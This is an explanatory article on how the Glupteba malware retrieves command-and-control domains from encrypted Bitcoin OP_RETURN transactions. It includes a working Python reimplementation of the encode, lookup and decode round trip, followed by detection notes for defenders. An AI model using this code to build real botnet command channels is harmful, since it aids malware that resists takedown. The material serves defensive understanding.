As technology has advanced, a criminal community has grown alongside it, working tirelessly to compromise code and databases in order to extract valuable information, including access to financial accounts.
Cryptocurrencies run on decentralized networks and rely entirely on the blockchain (and, on some platforms, smart contracts) to execute transactions. Attackers study these platforms closely, looking for ways to put them to malicious use.
Recently, the cryptocurrency sphere was dealt a blow when researchers found that a new version of the Glupteba malware dropper uses the Bitcoin blockchain to retrieve its command-and-control (C&C) server domains from Bitcoin transactions marked with the OP_RETURN script opcode.
First discovered in 2011, Glupteba is malware that hijacks a computer to steal data or enlist it in denial-of-service attacks. It was earlier installed on systems as a secondary payload by the Alureon Trojan, as part of a scheme to boost contextual advertising through click fraud (clickjacking).
The malware also appeared in "Operation Windigo", a campaign in which Windows computers were attacked.
Now the Glupteba dropper and backdoor Trojan has been found monitoring Bitcoin transactions. The dropper installs two extra components on the victim's computer: a browser stealer and a router exploiter.
The browser stealer component harvests the victim's browsing history, cookies, account names and passwords from the Chrome, Opera and Yandex browsers. The router exploiter component targets MikroTik RouterOS: the vulnerability it abuses lets the attackers create arbitrary files on the device, and they use that access to configure the router as a SOCKS proxy, hiding their real IP address behind it.
Glupteba's C&C-updating feature deserves a closer look. In its discoverDomain routine, the malware connects to Electrum Bitcoin wallet servers taken from a public list. It then uses a hard-coded script hash to request the transaction history of that script from the blockchain; because the ledger is public, every transaction ever made to that script, including the ones the operators publish with an OP_RETURN payload, is exposed to anyone who asks.
The latest version of Glupteba was delivered through a malvertising campaign centred on file-sharing websites. If the attackers lose control of the C&C server, they simply publish a new Bitcoin transaction carrying an OP_RETURN script; the infected system decrypts the script data to obtain the address of the new server and reconnects to it.
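To make the update mechanism concrete, here is an added worked example (not Glupteba's code, and not from the researchers who analysed it) of the whole round trip: an operator embeds an encrypted domain in an OP_RETURN output, and a client recovers it by computing the Electrum script hash, asking an Electrum server for that script's history, and decoding the newest OP_RETURN payload. The transaction, key, nonces and domains are constructed for the demo; the HMAC-based keystream cipher is a stand-in for whatever cipher the real sample uses, which this page does not name. The Electrum script-hash rule (SHA-256 of the scriptPubKey, byte-reversed, hex) and the `blockchain.scripthash.get_history` method are real Electrum protocol details; no network call is made.

```python
"""Added example: C2 domain distribution over Bitcoin OP_RETURN outputs.

Everything here is constructed for illustration. The cipher is a stand-in
(HMAC-SHA256 keystream), not the cipher used by the real malware.
"""
import hashlib
import hmac
import json
import struct

OP_RETURN = 0x6A
OP_PUSHDATA1 = 0x4C
NONCE_LEN = 8
KEY = b"constructed-demo-key-not-real"  # assumption: a hard-coded symmetric key


def read_varint(buf, pos):
    """Decode a Bitcoin CompactSize integer at buf[pos]; return (value, new_pos)."""
    first = buf[pos]
    if first < 0xFD:
        return first, pos + 1
    if first == 0xFD:
        return struct.unpack_from("<H", buf, pos + 1)[0], pos + 3
    if first == 0xFE:
        return struct.unpack_from("<I", buf, pos + 1)[0], pos + 5
    return struct.unpack_from("<Q", buf, pos + 1)[0], pos + 9


def parse_outputs(raw_tx):
    """Return [(value_satoshi, script_pubkey)] from a legacy (non-witness) serialized tx."""
    pos = 4  # skip version
    n_in, pos = read_varint(raw_tx, pos)
    for _ in range(n_in):
        pos += 36  # previous txid (32) + previous output index (4)
        slen, pos = read_varint(raw_tx, pos)
        pos += slen + 4  # scriptSig + sequence
    n_out, pos = read_varint(raw_tx, pos)
    outputs = []
    for _ in range(n_out):
        value = struct.unpack_from("<q", raw_tx, pos)[0]
        pos += 8
        slen, pos = read_varint(raw_tx, pos)
        outputs.append((value, raw_tx[pos:pos + slen]))
        pos += slen
    return outputs


def op_return_payload(script):
    """Return the data pushed by an OP_RETURN script, or None for any other script."""
    if len(script) < 2 or script[0] != OP_RETURN:
        return None
    opcode = script[1]
    if 1 <= opcode <= 75:            # direct push of 1..75 bytes
        data = script[2:2 + opcode]
        return data if len(data) == opcode else None
    if opcode == OP_PUSHDATA1 and len(script) >= 3:  # 76..80-byte standard payloads
        n = script[2]
        data = script[3:3 + n]
        return data if len(data) == n else None
    return None


def electrum_scripthash(script_pubkey):
    """Electrum protocol script hash: SHA-256 of the scriptPubKey, byte-reversed, hex."""
    return hashlib.sha256(script_pubkey).digest()[::-1].hex()


def electrum_history_request(scripthash, req_id=1):
    """The JSON-RPC line an Electrum client sends to list every tx touching a script."""
    return json.dumps({"id": req_id, "method": "blockchain.scripthash.get_history",
                       "params": [scripthash]}) + "\n"


def keystream_xor(key, nonce, data):
    """Stand-in stream cipher: HMAC-SHA256(key, nonce||counter) blocks XORed over data.
    Symmetric, so one function both encrypts and decrypts. Unauthenticated; demo only."""
    stream = bytearray()
    counter = 0
    while len(stream) < len(data):
        stream += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))


def encode_c2_payload(key, nonce, domain):
    """Operator side: nonce || ciphertext, small enough for a single OP_RETURN push."""
    return nonce + keystream_xor(key, nonce, domain.encode("ascii"))


def decode_c2_payload(key, payload):
    """Bot side: split nonce and ciphertext, decrypt, and reject non-hostname results
    (OP_RETURN outputs from unrelated parties or a wrong key must not become a C2)."""
    if len(payload) <= NONCE_LEN:
        return None
    nonce, ciphertext = payload[:NONCE_LEN], payload[NONCE_LEN:]
    try:
        domain = keystream_xor(key, nonce, ciphertext).decode("ascii")
    except UnicodeDecodeError:
        return None
    return domain if all(c.isalnum() or c in ".-" for c in domain) else None


def build_tx_with_op_return(payload):
    """Constructed legacy tx: one dummy input, one dust P2PKH output, one OP_RETURN output."""
    script = bytes([OP_RETURN, len(payload)]) + payload           # payload <= 75 bytes
    tx = struct.pack("<i", 1)                                       # version
    tx += b"\x01" + b"\x00" * 32 + struct.pack("<I", 0)             # 1 input, null outpoint
    tx += b"\x00" + struct.pack("<I", 0xFFFFFFFF)                  # empty scriptSig, sequence
    tx += b"\x02"                                                   # 2 outputs
    tx += struct.pack("<q", 546) + b"\x19" + bytes.fromhex("76a914") + b"\x11" * 20 + bytes.fromhex("88ac")
    tx += struct.pack("<q", 0) + bytes([len(script)]) + script
    tx += struct.pack("<I", 0)                                      # locktime
    return tx


def resolve_c2(raw_txs, key):
    """Walk a script's history in chain order; the newest decodable OP_RETURN wins."""
    domain = None
    for raw in raw_txs:
        for _, script in parse_outputs(raw):
            payload = op_return_payload(script)
            candidate = decode_c2_payload(key, payload) if payload is not None else None
            if candidate:
                domain = candidate
    return domain


if __name__ == "__main__":
    watched = bytes.fromhex("76a914") + b"\x11" * 20 + bytes.fromhex("88ac")
    print(electrum_history_request(electrum_scripthash(watched)), end="")
    old = build_tx_with_op_return(encode_c2_payload(KEY, b"\x01" * NONCE_LEN, "old-c2.example"))
    new = build_tx_with_op_return(encode_c2_payload(KEY, b"\x02" * NONCE_LEN, "new-c2.example"))
    print(resolve_c2([old, new], KEY))
```

Two properties of the scheme stand out for defenders. The transactions are public and append-only, so the channel cannot be sinkholed the way a domain can; what can be observed is the bot's Electrum traffic, and the JSON line above is the kind of request worth matching on. And because anyone can pay to the watched script, the bot must reject OP_RETURN payloads that do not decrypt to a well-formed hostname, which is why the decode step validates its output rather than trusting it.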